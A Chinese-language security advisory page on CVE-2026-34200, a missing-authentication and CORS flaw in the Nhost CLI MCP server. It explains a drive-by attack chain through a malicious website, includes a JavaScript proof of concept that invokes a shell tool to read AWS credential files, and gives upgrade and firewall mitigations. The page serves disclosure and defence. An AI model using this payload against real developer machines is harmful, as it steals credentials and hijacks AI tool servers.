IPBUF安全漏洞报告
English
CVE-2026-34200 CVSS 7.5 高危

CVE-2026-34200 Nhost CLI认证缺失漏洞

披露日期: 2026-03-31

漏洞信息

漏洞编号
CVE-2026-34200
漏洞类型
认证缺失
CVSS评分
7.5 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Nhost CLI

相关标签

认证缺失CORSNhostMCP远程代码执行

漏洞概述

Nhost CLI在1.41.0之前的版本中存在安全漏洞。当Nhost CLI MCP服务器被显式配置为监听网络端口时,缺乏入站身份验证且未强制执行严格的CORS策略。攻击者可诱导开发者在同一机器上访问恶意网站,利用该漏洞发起跨域请求,调用MCP服务器的特权工具,进而窃取凭据或执行敏感操作。该漏洞需要特定的非默认配置才能被利用。官方已在1.41.0版本中修复此问题。

技术细节

该漏洞的核心成因在于Nhost CLI MCP服务器在特定配置下未能实施有效的安全边界保护。默认情况下,MCP服务器运行在较为安全的环境中,但当管理员显式配置其监听网络端口(如绑定到0.0.0.0)时,服务暴露面扩大。在此状态下,服务端未对入站请求进行身份验证,导致任何能访问该端口的请求均被视为可信。更为严重的是,服务端未配置严格的跨域资源共享(CORS)策略。攻击者利用这一点,通过诱导开发者访问恶意网站,利用浏览器的跨域请求机制向本地的MCP服务端口发送恶意指令。由于MCP协议允许调用各种开发工具(如文件系统访问、Shell命令执行等),攻击者可以利用开发者本地已配置的高权限凭证,远程执行任意系统命令或窃取敏感代码,完全接管开发环境。

攻击链分析

STEP 1
发现与配置
攻击者确认目标使用Nhost CLI且MCP服务器配置为监听网络端口(非默认配置)。
STEP 2
诱导访问
攻击者诱导开发者在同一台机器上访问托管了恶意JavaScript代码的网站。
STEP 3
跨域请求
恶意网页利用浏览器向本地的MCP服务端口发送跨域HTTP请求,试图调用特权工具。
STEP 4
执行攻击
由于缺乏认证和CORS限制,MCP服务器接收请求并利用开发者本地凭据执行恶意命令。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
// Conceptual PoC for CVE-2026-34200 // Exploitation requires the victim to visit a malicious site while MCP server is running. async function attackMCP() { // Target the local MCP server port (example port) const target = 'http://localhost:3000/mcp/tools/invoke'; // Construct a malicious payload to execute a command or read a file const payload = { "tool": "system_shell", "arguments": { "command": "cat ~/.aws/credentials" } }; try { // Send request using fetch. Due to CORS misconfiguration, this may succeed. const response = await fetch(target, { method: 'POST', headers: { 'Content-Type': 'application/json' }, body: JSON.stringify(payload) }); const data = await response.json(); console.log('Exfiltrated Data:', data); } catch (e) { console.error('Attack failed (might still have executed server-side):', e); } } attackMCP();

影响范围

Nhost CLI < 1.41.0

防御指南

临时缓解措施
建议立即将Nhost CLI升级至1.41.0或更高版本以彻底修复该漏洞。如果暂时无法升级,请务必检查MCP服务器的配置,确保其未监听公网或局域网接口,仅保留本地回环访问,并在系统防火墙中阻止对相关端口的非本地入站连接。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表